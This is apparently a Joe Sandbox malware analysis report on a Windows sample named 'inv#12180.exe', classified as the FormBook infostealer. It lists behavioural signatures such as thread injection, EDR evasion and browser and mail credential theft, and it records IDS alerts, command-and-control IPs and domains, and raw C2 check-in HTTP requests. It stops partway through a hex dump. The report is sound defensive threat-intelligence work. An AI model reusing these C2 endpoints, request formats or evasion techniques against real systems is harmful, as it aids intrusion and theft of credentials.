Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
inv#12180.exe

Overview

General Information

Sample name:inv#12180.exe
Analysis ID:1583239
MD5:cd504bdaa0159b25fdea4b248bb76fa8
SHA1:27f9a4dd083d8058b54f3ad4f62ac29e33d95fcf
SHA256:eca3e3a869dee81023d04034fdc14383bceb58d79aa4d5bc6b2f4378e4a01acb
Tags:exeuser-asdasdd
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file does not import any functions
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • inv#12180.exe (PID: 3792 cmdline: "C:\Users\user\Desktop\inv#12180.exe" MD5: CD504BDAA0159B25FDEA4B248BB76FA8)
    • YVdkpeLSDe.exe (PID: 5232 cmdline: "C:\Program Files (x86)\snEJIgTPegGsTsZyBYpprsBhjenSYfImDnELhyUam\YVdkpeLSDe.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • fc.exe (PID: 5812 cmdline: "C:\Windows\SysWOW64\fc.exe" MD5: 4D5F86B337D0D099E18B14F1428AAEFF)
        • YVdkpeLSDe.exe (PID: 3052 cmdline: "C:\Program Files (x86)\snEJIgTPegGsTsZyBYpprsBhjenSYfImDnELhyUam\YVdkpeLSDe.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • firefox.exe (PID: 3556 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.3359525839.0000000002BF0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000007.00000002.3360691498.0000000002490000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000005.00000002.3358673454.0000000002970000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000005.00000002.3358452668.00000000006A0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000000.00000002.2502674902.0000000001780000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 3 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.inv#12180.exe.8f0000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

              Sigma Signatures

              No Sigma rule has matched

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-02T09:18:50.967762+010020507451Malware Command and Control Activity Detected192.168.2.64998147.83.1.9080TCP
              2025-01-02T09:19:14.209016+010020507451Malware Command and Control Activity Detected192.168.2.64998784.32.84.3280TCP
              2025-01-02T09:19:27.554714+010020507451Malware Command and Control Activity Detected192.168.2.649991172.67.182.19880TCP
              2025-01-02T09:19:41.384718+010020507451Malware Command and Control Activity Detected192.168.2.649995154.21.203.2480TCP
              2025-01-02T09:19:54.705543+010020507451Malware Command and Control Activity Detected192.168.2.650000199.192.21.16980TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-02T09:18:50.967762+010028554651A Network Trojan was detected192.168.2.64998147.83.1.9080TCP
              2025-01-02T09:19:14.209016+010028554651A Network Trojan was detected192.168.2.64998784.32.84.3280TCP
              2025-01-02T09:19:27.554714+010028554651A Network Trojan was detected192.168.2.649991172.67.182.19880TCP
              2025-01-02T09:19:41.384718+010028554651A Network Trojan was detected192.168.2.649995154.21.203.2480TCP
              2025-01-02T09:19:54.705543+010028554651A Network Trojan was detected192.168.2.650000199.192.21.16980TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-02T09:19:06.553230+010028554641A Network Trojan was detected192.168.2.64998384.32.84.3280TCP
              2025-01-02T09:19:09.104885+010028554641A Network Trojan was detected192.168.2.64998484.32.84.3280TCP
              2025-01-02T09:19:11.661370+010028554641A Network Trojan was detected192.168.2.64998684.32.84.3280TCP
              2025-01-02T09:19:19.897883+010028554641A Network Trojan was detected192.168.2.649988172.67.182.19880TCP
              2025-01-02T09:19:22.443510+010028554641A Network Trojan was detected192.168.2.649989172.67.182.19880TCP
              2025-01-02T09:19:25.028001+010028554641A Network Trojan was detected192.168.2.649990172.67.182.19880TCP
              2025-01-02T09:19:33.773711+010028554641A Network Trojan was detected192.168.2.649992154.21.203.2480TCP
              2025-01-02T09:19:36.322319+010028554641A Network Trojan was detected192.168.2.649993154.21.203.2480TCP
              2025-01-02T09:19:38.862961+010028554641A Network Trojan was detected192.168.2.649994154.21.203.2480TCP
              2025-01-02T09:19:47.021501+010028554641A Network Trojan was detected192.168.2.649997199.192.21.16980TCP
              2025-01-02T09:19:49.599573+010028554641A Network Trojan was detected192.168.2.649998199.192.21.16980TCP
              2025-01-02T09:19:52.123868+010028554641A Network Trojan was detected192.168.2.649999199.192.21.16980TCP
              2025-01-02T09:20:00.687438+010028554641A Network Trojan was detected192.168.2.650001154.197.162.23980TCP
              2025-01-02T09:20:03.856960+010028554641A Network Trojan was detected192.168.2.650002154.197.162.23980TCP
              2025-01-02T09:20:06.419000+010028554641A Network Trojan was detected192.168.2.650003154.197.162.23980TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: inv#12180.exeAvira: detected
              Antivirus detection for URL or domain
              Source: http://www.gayhxi.info/k2i2/?AZhlI=2P00kRyHXnBDvT&58=oYl0YuhK+EfenM8ZaSaHfCiYAhLiDDJWSGf6Q1012MfAC24gU0JLDS7JdRiR078xrhufJIQsd6i55/X9+LeTWgf0QosAiOAvVd+8Dka4oeApiw402Mgl8dYUz322qMWWIHFaw/E=Avira URL Cloud: Label: malware
              Multi AV Scanner detection for submitted file
              Source: inv#12180.exeVirustotal: Detection: 62%Perma Link
              Source: inv#12180.exeReversingLabs: Detection: 60%
              Yara detected FormBook
              Source: Yara matchFile source: 0.2.inv#12180.exe.8f0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000005.00000002.3359525839.0000000002BF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.3360691498.0000000002490000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.3358673454.0000000002970000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.3358452668.00000000006A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2502674902.0000000001780000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2501936553.00000000008F1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2503026134.0000000002C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3359820951.0000000003D00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Machine Learning detection for sample
              Source: inv#12180.exeJoe Sandbox ML: detected
              Source: inv#12180.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: inv#12180.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: fc.pdb source: inv#12180.exe, 00000000.00000003.2501855410.0000000000E5C000.00000004.00000020.00020000.00000000.sdmp, YVdkpeLSDe.exe, 00000004.00000002.3359345326.0000000000CC8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: fc.pdbGCTL source: inv#12180.exe, 00000000.00000003.2501855410.0000000000E5C000.00000004.00000020.00020000.00000000.sdmp, YVdkpeLSDe.exe, 00000004.00000002.3359345326.0000000000CC8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: YVdkpeLSDe.exe, 00000004.00000000.2421220476.00000000006BE000.00000002.00000001.01000000.00000005.sdmp, YVdkpeLSDe.exe, 00000007.00000000.2568638507.00000000006BE000.00000002.00000001.01000000.00000005.sdmp
              Source: Binary string: wntdll.pdbUGP source: inv#12180.exe, 00000000.00000003.2408019379.0000000001286000.00000004.00000020.00020000.00000000.sdmp, inv#12180.exe, 00000000.00000002.2502269063.00000000015CE000.00000040.00001000.00020000.00000000.sdmp, inv#12180.exe, 00000000.00000003.2405953655.00000000010D4000.00000004.00000020.00020000.00000000.sdmp, inv#12180.exe, 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000005.00000003.2504125570.0000000002CA4000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000005.00000002.3359751521.0000000002E50000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000005.00000002.3359751521.0000000002FEE000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000005.00000003.2502130229.0000000002AFD000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: inv#12180.exe, inv#12180.exe, 00000000.00000003.2408019379.0000000001286000.00000004.00000020.00020000.00000000.sdmp, inv#12180.exe, 00000000.00000002.2502269063.00000000015CE000.00000040.00001000.00020000.00000000.sdmp, inv#12180.exe, 00000000.00000003.2405953655.00000000010D4000.00000004.00000020.00020000.00000000.sdmp, inv#12180.exe, 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, fc.exe, fc.exe, 00000005.00000003.2504125570.0000000002CA4000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000005.00000002.3359751521.0000000002E50000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000005.00000002.3359751521.0000000002FEE000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000005.00000003.2502130229.0000000002AFD000.00000004.00000020.00020000.00000000.sdmp
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_006BC870 FindFirstFileW,FindNextFileW,FindClose,5_2_006BC870
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4x nop then xor eax, eax5_2_006A9EC0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4x nop then pop edi5_2_006AE4C7
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4x nop then mov ebx, 00000004h5_2_02CF04CE

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49994 -> 154.21.203.24:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49999 -> 199.192.21.169:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49988 -> 172.67.182.198:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49992 -> 154.21.203.24:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49989 -> 172.67.182.198:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49997 -> 199.192.21.169:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50001 -> 154.197.162.239:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50002 -> 154.197.162.239:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49990 -> 172.67.182.198:80
              Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49991 -> 172.67.182.198:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49991 -> 172.67.182.198:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49984 -> 84.32.84.32:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49983 -> 84.32.84.32:80
              Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49987 -> 84.32.84.32:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49987 -> 84.32.84.32:80
              Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49995 -> 154.21.203.24:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49995 -> 154.21.203.24:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49998 -> 199.192.21.169:80
              Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49981 -> 47.83.1.90:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49981 -> 47.83.1.90:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49993 -> 154.21.203.24:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49986 -> 84.32.84.32:80
              Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50000 -> 199.192.21.169:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50000 -> 199.192.21.169:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50003 -> 154.197.162.239:80
              Source: Joe Sandbox ViewIP Address: 199.192.21.169 199.192.21.169
              Source: Joe Sandbox ViewIP Address: 84.32.84.32 84.32.84.32
              Source: Joe Sandbox ViewASN Name: COMING-ASABCDEGROUPCOMPANYLIMITEDHK COMING-ASABCDEGROUPCOMPANYLIMITEDHK
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
              Source: Joe Sandbox ViewASN Name: VODANETInternationalIP-BackboneofVodafoneDE VODANETInternationalIP-BackboneofVodafoneDE
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /k2i2/?AZhlI=2P00kRyHXnBDvT&58=oYl0YuhK+EfenM8ZaSaHfCiYAhLiDDJWSGf6Q1012MfAC24gU0JLDS7JdRiR078xrhufJIQsd6i55/X9+LeTWgf0QosAiOAvVd+8Dka4oeApiw402Mgl8dYUz322qMWWIHFaw/E= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.gayhxi.infoConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
              Source: global trafficHTTP traffic detected: GET /zaz4/?58=a/HH2smDyRg6YmpNlpDSiGBzLdYAcGrERV51bzugA0E0jiOKNXfjwD9byDsX3ja9PlsooGpF4nQX9l9MtzddvEJa00pgxMS/8uYz9VBXNTWbWf/uKLTh5jUQ9SsZ4eSETpRQQJc=&AZhlI=2P00kRyHXnBDvT HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.promocao.infoConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
              Source: global trafficHTTP traffic detected: GET /kxtt/?58=eC1oD4IhFSd/6jtL1AhIhKazMaYu9E65zKGW4KqWLMPitrzcqar0FZhKX10RVuOt75j4smH0EDZzb9gyazsXvWclXvo3kWkxBBtOzLzdzXSMQ2FkkrP/66suezda9Novq3ipBd8=&AZhlI=2P00kRyHXnBDvT HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.grimbo.boatsConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
              Source: global trafficHTTP traffic detected: GET /a59t/?58=4xL6Q7DrxWj99jxZ5aXf1AQ9gWZB5E5jNwylhh0vBKzMCs+5V4gzFQ4JFVb3bklsevH6tDeLKuQQ/YMUh7acgIazDBG/TFF/REucHmN8GJFpkvs6MD1/91Qml7NfLeQ7pQK3fwg=&AZhlI=2P00kRyHXnBDvT HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.44756.pizzaConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
              Source: global trafficHTTP traffic detected: GET /bowc/?AZhlI=2P00kRyHXnBDvT&58=hSFyBF7QNpd6wUo32OUgsrg4/MrOyIQWjK6IJxkbiJgyDGKURjVOywd5a/1i9fugKQVYW71g1Iqe5QUBl7nOwYRaJOa9Z44z2qtPWfGvKNoA9tlUfzwY1s4wtqx/AHoNma7bQRw= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.lonfor.websiteConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
              Source: global trafficDNS traffic detected: DNS query: www.gayhxi.info
              Source: global trafficDNS traffic detected: DNS query: www.promocao.info
              Source: global trafficDNS traffic detected: DNS query: www.grimbo.boats
              Source: global trafficDNS traffic detected: DNS query: www.44756.pizza
              Source: global trafficDNS traffic detected: DNS query: www.lonfor.website
              Source: global trafficDNS traffic detected: DNS query: www.investshares.net
              Source: unknownHTTP traffic detected: POST /zaz4/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USAccept-Encoding: gzip, deflateHost: www.promocao.infoOrigin: http://www.promocao.infoCache-Control: max-age=0Content-Length: 207Connection: closeContent-Type: application/x-www-form-urlencodedReferer: http://www.promocao.info/zaz4/User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1Data Raw: 35 38 3d 58 39 76 6e 31 62 32 5a 30 41 74 43 54 57 56 4c 74 5a 37 6c 74 33 63 57 66 4c 59 46 49 54 65 6c 44 6d 49 4e 59 51 44 4d 50 47 49 70 69 6b 71 30 47 56 72 77 37 78 31 67 31 67 4e 73 78 48 4b 56 59 57 4e 35 30 78 78 7a 31 33 63 66 2f 69 56 6a 69 44 31 75 74 42 6b 50 6b 6d 49 45 2b 71 53 43 34 64 51 30 76 54 73 32 4b 43 61 46 4a 75 6d 62 63 74 4c 62 31 47 55 4c 30 7a 64 45 33 73 44 6a 64 34 78 78 4a 2f 58 59 75 69 41 54 69 49 30 4a 62 78 78 57 64 5a 51 72 51 56 43 54 41 44 63 7a 76 64 66 4e 36 53 79 53 4c 66 43 35 54 61 31 39 71 51 64 58 7a 53 5a 56 52 4d 34 47 64 54 49 4e 72 54 49 2b 4f 52 48 6f 38 74 68 50 Data Ascii: 58=X9vn1b2Z0AtCTWVLtZ7lt3cWfLYFITelDmINYQDMPGIpikq0GVrw7x1g1gNsxHKVYWN50xxz13cf/iVjiD1utBkPkmIE+qSC4dQ0vTs2KCaFJumbctLb1GUL0zdE3sDjd4xxJ/XYuiATiI0JbxxWdZQrQVCTADczvdfN6SySLfC5Ta19qQdXzSZVRM4GdTINrTI+ORHo8thP
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 02 Jan 2025 08:19:19 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hOdK1ZM42PiAvXvgiRU6h%2B8AicrJM9qqRQYwo%2B40e%2Bo56zd5CdJcoCP%2F%2Fo7ox17I96KCb58CdN%2F2thd4SO6%2FuRYGCkRI7rgLl14cOu7KFqXGaiC%2BlLf8VFq0Cgq2ggMhiaCO"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8fb952cfdcbe43fb-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2342&min_rtt=2342&rtt_var=1171&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=739&delivery_rate=0&cwnd=178&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 65 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c3 40 14 84 ef fb 2b 9e 3d e9 c1 7d 69 88 e0 e1 b1 60 9b 14 0b b1 06 9b 1c 3c 6e ba ab 1b 68 b3 71 f7 c5 e0 bf 97 a4 08 5e 67 be 19 66 e8 26 7f dd d6 ef 55 01 cf f5 4b 09 55 b3 29 f7 5b 58 dd 23 ee 8b 7a 87 98 d7 f9 d5 49 65 82 58 1c 56 4a 90 e3 cb 59 91 b3 da 28 41 dc f1 d9 aa 2c c9 e0 e0 19 76 7e ec 0d e1 55 14 84 0b 44 ad 37 3f 73 6e ad fe 31 6e ad 04 0d aa 76 16 82 fd 1a 6d 64 6b a0 79 2b 61 d2 11 7a cf f0 31 73 e0 7b 60 d7 45 88 36 7c db 20 09 87 b9 29 28 41 da 98 60 63 54 4f 83 3e 39 8b a9 cc e4 43 0a b7 4d 3b f6 3c de c1 71 09 80 66 98 a6 49 7e 86 ee d2 7a d9 7a cd 11 2a 1f 18 1e 13 c2 bf 0a 41 b8 6c 24 5c be fd 02 00 00 ff ff e3 02 00 b2 5e 55 84 16 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: efLAK@+=}i`<nhq^gf&UKU)[X#zIeXVJY(A,v~UD7?sn1nvmdky+az1s{`E6| )(A`cTO>9CM;<qfI~zz*Al$\^U0
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 02 Jan 2025 08:19:22 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BKNgFEPtyw8O1mws3Z0TcjFetIMuDUI7Lk%2Fw3k5jRkvtCxEmYrcG5GWvG9cWQVKfAqtcBFg%2BlaNiCDYh47dIcKiX7ESWq6UQ1zXaOjeKA0cLT07LiiIh33mKHDwBXlWuQTFI"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8fb952dfb9e18c06-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1745&min_rtt=1745&rtt_var=872&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=763&delivery_rate=0&cwnd=161&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 65 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c3 40 14 84 ef fb 2b 9e 3d e9 c1 7d 69 88 e0 e1 b1 60 9b 14 0b b1 06 9b 1c 3c 6e ba ab 1b 68 b3 71 f7 c5 e0 bf 97 a4 08 5e 67 be 19 66 e8 26 7f dd d6 ef 55 01 cf f5 4b 09 55 b3 29 f7 5b 58 dd 23 ee 8b 7a 87 98 d7 f9 d5 49 65 82 58 1c 56 4a 90 e3 cb 59 91 b3 da 28 41 dc f1 d9 aa 2c c9 e0 e0 19 76 7e ec 0d e1 55 14 84 0b 44 ad 37 3f 73 6e ad fe 31 6e ad 04 0d aa 76 16 82 fd 1a 6d 64 6b a0 79 2b 61 d2 11 7a cf f0 31 73 e0 7b 60 d7 45 88 36 7c db 20 09 87 b9 29 28 41 da 98 60 63 54 4f 83 3e 39 8b a9 cc e4 43 0a b7 4d 3b f6 3c de c1 71 09 80 66 98 a6 49 7e 86 ee d2 7a d9 7a cd 11 2a 1f 18 1e 13 c2 bf 0a 41 b8 6c 24 5c be fd 02 00 00 ff ff e3 02 00 b2 5e 55 84 16 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: efLAK@+=}i`<nhq^gf&UKU)[X#zIeXVJY(A,v~UD7?sn1nvmdky+az1s{`E6| )(A`cTO>9CM;<qfI~zz*Al$\^U0
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 02 Jan 2025 08:19:24 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LJeRBCSme9uvL5%2Fi2hjmfO7b9w6nvPda3ttuoCQNRnQ2XJoskejT8uSJWtzSL4BxrAPY73ln7oxvukVg0z3jyVc5F0NyM3FdxeuDEDUvehRuiDbaxtocWx4u6IvhcE2qai%2B8"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8fb952efbd0d4302-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2049&min_rtt=2049&rtt_var=1024&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1776&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 65 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c3 40 14 84 ef fb 2b 9e 3d e9 c1 7d 69 88 e0 e1 b1 60 9b 14 0b b1 06 9b 1c 3c 6e ba ab 1b 68 b3 71 f7 c5 e0 bf 97 a4 08 5e 67 be 19 66 e8 26 7f dd d6 ef 55 01 cf f5 4b 09 55 b3 29 f7 5b 58 dd 23 ee 8b 7a 87 98 d7 f9 d5 49 65 82 58 1c 56 4a 90 e3 cb 59 91 b3 da 28 41 dc f1 d9 aa 2c c9 e0 e0 19 76 7e ec 0d e1 55 14 84 0b 44 ad 37 3f 73 6e ad fe 31 6e ad 04 0d aa 76 16 82 fd 1a 6d 64 